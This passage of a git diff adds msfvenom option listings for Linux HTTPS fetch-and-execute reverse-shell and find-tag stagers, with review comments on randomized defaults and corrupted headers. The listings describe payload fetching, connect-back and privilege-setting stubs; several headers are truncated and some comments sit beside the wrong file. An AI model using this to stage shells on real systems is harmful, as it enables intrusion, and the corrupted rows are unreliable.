yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload 
msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt new file mode 100644 index 0000000..4fea695 --- /dev/null 
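Review bot: the FETCH_FILENAME default "ayeQmgmImG" in this hunk's "When FETCH_FILELESS is none" table is a value msfvenom randomizes on every invocation, so this generated file will produce a spurious diff each time the documentation is regenerated, with no real option change behind it. Consider having the generator replace that random default with a fixed placeholder (for example "<random>") before writing the file, so that only genuine metadata changes show up in review. Every other payload_options file added in this patch carries a different random string on the same row for the same reason.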
+++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt 
@@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/https/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RCzcOyxjQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG OXG0 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..9d8e5f0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt 
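Review bot: the AppendExit row in this hunk's advanced-options table reads "Prepend a stub that will break out of a chroot (includes setreuid to root)", which is the PrependChrootBreak description repeated rather than a description of AppendExit. The text is captured verbatim from the module metadata, so the fix belongs upstream in Metasploit rather than in this dump, but it deserves a mention in the commit message or an upstream issue so readers of these files do not take it at face value. Separately, "TAG OXG0" is a randomized four-byte default, like "FETCH_FILENAME RCzcOyxjQ", so this file will also churn on regeneration unless the generator normalizes it.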
@@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp: +========================= + + + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kXWmBKViLXp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no 
The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..283a3bf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt 
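Review bot: the header block of this file is corrupted: after "Needs Admin: No" the hunk continues with "+ T", then "+Evasion options for payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp:" and a row of "=", and of the "Provided by" list only "kris katterjohn" survives, so the Total size, Rank and Provided by lines have been overwritten. This looks like the evasion-options listing being written into the same file in the middle of the module info (interleaved output streams or a concurrent write), not like genuine module output; the bind_tcp_uuid and find_tag files in this patch do not show the problem. Please regenerate this file so the two sections are written one after the other and the size and rank fields are intact.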
@@ -0,0 +1,102 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/linux/https/x86/shell/reverse_nonx_tcp: +========================= + +r@hick.org> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME APdgfgVHBusd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The 
directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..1d7fbfb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt 
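Review bot: same truncation as in the reverse_ipv6_tcp file: "Total si" followed by the "Evasion options for payload/cmd/linux/https/x86/shell/reverse_nonx_tcp:" banner, and the author list reduced to the fragment "r@hick.org>", the tail of an e-mail address whose owner can no longer be identified from the file. The file needs regenerating; a check in the generator that every written file contains a "Total size:" and a "Rank:" line would catch this class of corruption before it is committed.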
@@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Tot +Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp: +========================= + +pe + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JcnAayht no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The 
directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..1688b45 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt 
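Review bot: this file shows the same corruption ("Tot" followed by the "Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp:" banner, and an author list that starts with the fragment "pe" before "egypt" and "tkmru"), and the reverse_tcp_uuid hunk that follows shows it as well ("Total si", "r@hick.org>"). Since all four reverse_* files in this patch are affected while both non-reverse files are clean, the cause is most likely systematic in how the generator handles modules that print an evasion-options section; fixing that once and regenerating the whole directory is preferable to repairing the files by hand.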
@@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp_uuid: +========================= + +r@hick.org> + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PuAcJbYKt no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The 
directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
